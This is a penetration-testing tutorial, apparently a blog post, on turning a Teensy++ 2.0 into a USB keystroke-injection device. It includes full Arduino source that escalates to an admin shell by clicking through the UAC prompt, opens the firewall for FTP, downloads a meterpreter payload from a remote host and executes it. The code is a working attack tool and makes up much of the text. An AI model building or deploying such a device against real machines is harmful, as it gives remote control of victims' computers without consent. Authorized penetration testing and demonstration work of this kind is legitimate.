I bought a Teensy++ 2.0 to use for demonstration purposes and I realized that there are a lot of information and howtos when it comes to penetration testing, but I didn’t find a really good article that took everything from start to finish. So I decided to put together something of my own with inspiration from what other people had done.
The first thing to do is to download Arduino IDE at http://arduino.cc/en/Main/Software I used version 1.6.0 in this article.
The next step is to download phukdlib from here:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
Version 0.3 should work fine.
Next is the source code, that you should upload to the Teensy. Let me walk you through what is going on. This code only works for Windows 7 and higher.
1. The desktop is shown
2. The start menu is opened
3. Powershell is started
4. cmd is asked to start as RunAs (Start-Process cmd -Verb runAs) which means that it will try to do a privilege escalation. This is required for the next step.
5. A firewall rule for FTP is added
6. The file bumbi.exe is downloaded
7. The file is executed
The file bumbi.exe in this case is a meterpreter payload of your choice. Of course you can do this much easier by simply encoding a meterpreter as powershell but I found this example and thought it was pretty neat. It does however add the extra step of having to add the firewall rule. Otherwise you will get the question, “Do you want to allow this traffic?” when starting the ftp transfer.
A final note on the code, this was programmed using the keyboard layout for Swedish in Arduino IDE, so you may have to change the code for the FTP firewall rule, if you are having issues getting that part to work.
Source code for the project:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
#include <phukdlib.h> #include <PS2Keyboard.h> int ledpin = 6; void setup() { // put your setup code here, to run once: delay(3000); } void showDesktop() { Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_D); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void addFirewallRule() { Keyboard.print("netsh advfirewall firewall add rule name=\"FTP\" dir=in action=allow program=\"C:\\windows\\system32\\ftp.exe\" enable=yes"); PressAndRelease(KEY_ENTER, 1); } void downloadAndExecPayload() { Keyboard.print("ftp -A 172.16.28.32"); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("GET bumbi.exe"); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("bye"); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("bumbi.exe"); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("exit"); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("exit"); PressAndRelease(KEY_ENTER, 1); } void runCmdAsAdmin() { CommandAtRunBarMSWIN("powershell"); delay(200); PressAndRelease(KEY_ENTER, 1); delay(200); Keyboard.print("Start-Process cmd -Verb runAs"); PressAndRelease(KEY_ENTER, 1); delay(600); PressAndRelease(KEY_LEFT, 1); delay(500); PressAndRelease(KEY_SPACE, 1); delay(500); } void loop() { digitalWrite(ledpin, HIGH); showDesktop(); delay(300); runCmdAsAdmin(); delay(300); addFirewallRule(); delay(300); downloadAndExecPayload(); delay(300); digitalWrite(ledpin, LOW); for(int i=0; i<20;i++) { digitalWrite(ledpin, HIGH); delay(500); digitalWrite(ledpin, LOW); delay(500); } delay(360000000); } |
More information about the Teensy and what you can done can be found on the links below